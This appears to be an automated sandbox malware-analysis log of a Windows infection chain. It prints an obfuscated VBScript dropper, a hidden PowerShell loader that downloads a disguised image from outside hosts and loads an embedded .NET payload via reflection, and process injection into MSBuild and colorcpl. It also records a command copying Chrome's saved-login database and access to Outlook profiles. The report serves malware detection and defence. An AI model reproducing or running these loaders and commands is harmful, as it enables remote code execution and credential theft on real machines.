Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTre Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('wBUgp6qysF58iJA!=yekhtua&21112%08168C3C4F36F6E4=diser?daolnwod/moc.evil.evirdeno//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe" Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\colorcpl.exe "C:\Windows\SysWOW64\colorcpl.exe" Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\explorer.exe Section loaded: mfsrcsnk.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: colorui.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mscms.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: coloradapterclient.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe File written: C:\Users\user\AppData\Roaming\J4L3O90F\J4Llogri.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Binary string: firefox.pdbP source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: colorcpl.pdbGCTL source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: colorcpl.pdb source: MSBuild.exe, 00000005.00000002.1874447638.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000005.00000002.1873865542.0000000000ED0000.00000040.10000000.00040000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000002.2930841822.00000000000E0000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: colorcpl.exe, 00000008.00000002.2931288836.00000000032EF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: MSBuild.exe, MSBuild.exe, 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, colorcpl.exe, 00000008.00000003.1873152965.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.1875146322.0000000004F39000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.00000000050E0000.00000040.00001000.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000002.2932383169.000000000527E000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: firefox.pdb source: colorcpl.exe, 00000008.00000003.2007973270.00000000069B5000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000008.00000003.2058701262.0000000006A65000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
VBScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: WScript.CreateObject("WScript.Shell") ovarista = ("$(@(?(@?@?dig@?@? = '") & tangendo & "'" ovarista = ovarista & ";$@?@?Wjuxd = [??}@*y??}@*t?*(?m.T?*(?xt.?*(?n(@(?(oding]::Uni(@(?(od?*(?.G?*(?tString(" ovarista = ovarista & "[??}@*y??}@*" ovarista = ovarista & "t?*(?" ovarista = ovarista & "m.(@(?(@?@?" ovarista = ovarista & "nv?*(?r" ovarista = ovarista & "t]:" ovarista = ovarista & ":Fr@?@?" ovarista = ovarista & "mba??}@*" ovarista = ovarista & "?*(?64??}@*tring( $(@(?(" ovarista = ovarista & "@?@?d" ovarista = ovarista & "ig@?@?.r?*(?" ovarista = ovarista & "@%*:&la" ovarista = ovarista & "(@(?(?*(?('" ovarista = ovarista & "DgTr?*(?" ovarista = ovarista & "','" ovarista = ovarista & "A" ovarista = ovarista & "') ))" ovarista = ovarista & ";@%*:&@?@?wer??}@*hell.?*(?x?*(? -window??}@*tyl?*(? hidd?*(?n -?*(?x?*(?cution@%*:&olicy by@%*:&as??}@* -No@%*:&rofil?*(? -command $OWjuxD" ovarista = Replace(ovarista,"@%*:&","p") ovarista = Replace(ovarista,"(@(?(","c") ovarista = Replace(ovarista,"?*(?","e") ovarista = Replace(ovarista,"@?@?","o") ovarista = Replace(ovarista,"??}@*","s") trapalhona1 = "@%*:&@?@?wer??}@*hell -(@(?(@?@?mmand " trapalhona1 = Replace(trapalhona1,"(@(?(","c") trapalhona1 = Replace(trapalhona1,"??}@*","s") trapalhona1 = Replace(trapalhona1,"@?@?","o") trapalhona1 = Replace(trapalhona1,"@%*:&","p") trapalhona = trapalhona1 & """" & ovarista & """" Cama.Run trapalhona, 0, False IHost.Arguments();IArguments2.Count();IServerXMLHTTPRequest2.open("GET", "https://paste.ee/d/K2No9", "false");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.CreateObject("WScript.Shell");IWshShell3.Run("powershell -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreC", "0", "false")
Found suspicious powershell code related to unpacking or dynamic code loading
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: $codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTre